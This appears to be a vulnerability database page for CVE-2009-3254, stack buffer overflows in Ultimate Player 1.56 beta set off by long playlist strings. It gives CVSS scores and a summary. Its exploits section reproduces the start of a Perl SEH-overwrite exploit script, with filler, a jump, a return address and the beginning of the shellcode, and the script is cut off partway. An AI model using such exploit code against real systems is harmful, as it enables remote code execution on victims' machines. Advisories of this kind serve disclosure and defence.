9.3
CVSSv2

CVE-2009-3254

Published: 18/09/2009 Updated: 19/09/2017
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
VMScore: 935
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

Multiple stack-based buffer overflows in Ultimate Player 1.56 beta allow remote malicious users to execute arbitrary code via a long string in a (1) .m3u or (2) .upl playlist file.

Vulnerable Product Search on Vulmon Subscribe to Product

ultimatevideosite ultimate player 1.56

Exploits

#!/usr/bin/perl # by hack4love # hack4love@hotmailcom # Ultimate Player v 156 beta (m3u/upl) Universal Local BOF SEH #################################################################### my $bof="\x41" x 4108; my $nsh="\xEB\x06\x90\x90"; my $seh="\xb8\x15\xd1\x72";##tasted under sp2//sp3 univ my $nop="\x90" x 20; my $sec= "\xeb\x03\x59\xeb\x05\xe ...